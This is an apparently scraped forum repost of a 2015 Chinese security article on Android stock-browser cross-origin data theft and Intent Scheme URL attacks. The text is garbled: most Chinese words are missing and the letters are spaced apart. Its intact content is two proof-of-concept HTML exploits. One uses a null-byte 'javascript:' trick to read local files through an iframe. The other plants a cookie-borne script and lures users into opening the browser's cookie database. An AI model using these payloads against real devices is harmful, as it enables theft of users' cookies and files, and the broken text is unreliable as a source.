搜索

[8557] 2015-01-05_Android浏览器跨域数据窃取和IntentScheme攻击

文档创建者:s7ckTeam
浏览次数:26
最后更新:2025-01-17
2015-01-05_Android浏览器跨域数据窃取和IntentScheme攻击 A n d r o i d I n t e n t   S c h e m e F r e e B u f   2 0 1 5 - 0 1 - 0 5 A n d r o i d 4 . 4 A n d r o i d s q l i t e c o o k i e c o o k i e A n d r o i d 4 . 4 F r e e B u f I n t e n t   S c h e m e   U R L I n t e n d - B a s e d I n t e n d - B a s e d W e b P a g e 访 c o o k i e I n t e n t - b a s e d i n t e n t S t o c k 使 f i l e : / / A n d r o i d C h r o m e F i r e f o x O p e r a 1 . 访 2 . 使 e x p l o i t . h t m l 3 . e x p l o i t . h t m l 4 . e x p l o i t . h t m l e x p H a r u   S u g i y a m a P O C h t t p : / / 1 3 3 . 2 4 2 . 1 3 4 . 2 4 1 / f i r e f o x / t e s t . h t m l A n d r o i d 访 F i r e f o x A n d r o i d A n d r o i d / s d c a r d / D o w n l o a d / e x p l o i t . h t m l s d c a r d e x p l o i t . h t m l A n d r o i d   2 . 3 . x A n d r o i d   4 . 1 . x - 4 . 3
A n d r o i d   2 . 3 . x 使 A n d r o i d   2 . 3 e x p l o i t . h t m l A n d r o i d A n d r o i d   2 . 3 . x 使 1 1 . 4 % w i n x p A n d r o i d 使 A n d r o i d   4 . 1 . x - 4 . 3 P O C < b u t t o n   o n c l i c k = " e x p l o i t ( ) " > R e a d   i f r a m e < / b u t t o n >   < b u t t o n   o n c l i c k = " w i n d o w . o p e n ( ' u 0 0 0 0 j a v a s c r i p t : a l e r t ( d o c u m e n t . b o d y . i n n e r H T M L ) ' , ' t e s t ' ) " > T r y   u 0 0 0 0 < / b u t t o n >   < i f r a m e   s r c = " f i l e : / d e f a u l t . p r o p "   n a m e = " t e s t "   s t y l e = ' w i d t h : 1 0 0 % ; h e i g h t : 2 0 0 ' > < / i f r a m e >   < s c r i p t >   f u n c t i o n   e x p l o i t ( )   {             v a r   i f r a m e   =   d o c u m e n t . g e t E l e m e n t s B y T a g N a m e ( ' i f r a m e ' ) [ 0 ] ;       t r y       {       a l e r t ( " T r y   t o   r e a d   l o c a l   f i l e . " ) ;                 a l e r t ( " c o n t e n t W i n d o w : " + i f r a m e . c o n t e n t W i n d o w ) ;                 a l e r t ( " d o c u m e n t : " + i f r a m e . c o n t e n t W i n d o w . d o c u m e n t ) ;                 a l e r t ( " b o d y : " + i f r a m e . c o n t e n t W i n d o w . d o c u m e n t . b o d y ) ;                 a l e r t ( " i n n e r H T M L : " + i f r a m e . c o n t e n t W i n d o w . d o c u m e n t . b o d y . i n n e r H T M L ) ;               }     c a t c h ( e )     {     a l e r t ( e ) ;           }     }   < / s c r i p t > C V E - 2 0 1 4 - 6 0 4 1 e x p I n t e n t   s c h e m e   U R L A n d r o i d   4 . 1 . x - 4 . 3 m e t a s p l o i t J o e   V e n n i x i n t e n t   s c h e m e P O C P O C J S c o o k i e c o o k i e s q l i t e c o o k i e J S c o o k i e P O C w e b v i e w C o o k i e C h r o m i u m . d b < ! d o c t y p e   h t m l >             < h t m l >
                < h e a d > < m e t a   n a m e = " v i e w p o r t "   c o n t e n t = " w i d t h = d e v i c e - w i d t h ,   u s e r - s c a l a b l e = n o "   / > < / h e a d >                 < b o d y   s t y l e = ' w i d t h : 1 0 0 % ; f o n t - s i z e : 1 6 p x ; l i n e - h e i g h t : 3 6 p x ; ; ' >                     < a   h r e f = ' f i l e : / / / d a t a / d a t a / c o m . a n d r o i d . b r o w s e r / d a t a b a s e s / w e b v i e w C o o k i e s C h r o m i u m . d b ' >                         R e d i r e c t i n g . . .   T o   c o n t i n u e ,   t a p   a n d   h o l d   h e r e ,   t h e n   c h o o s e   " O p e n   i n   a   n e w   t a b "                     < / a >                     < s c r i p t >                       d o c u m e n t . c o o k i e = ' x = < i m g   s r c = x   o n e r r o r = p r o m p t ( d o c u m e n t . b o d y . i n n e r H T M L ) > ' ;             < / s c r i p t >                 < / b o d y >             < / h t m l > J o e M e t a s p l o i t c o o k i e 使 h t t p o n l y M e t a s p l o i t : c o o k i e c o o k i e c o o k i e 2 0 1 4 2 [ r a f a y h a c k i n g a r t i c l e s , w o o y u n / F r e e B u f d a w n e r F r e e B u f
F r e e B u f . C O M ]
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理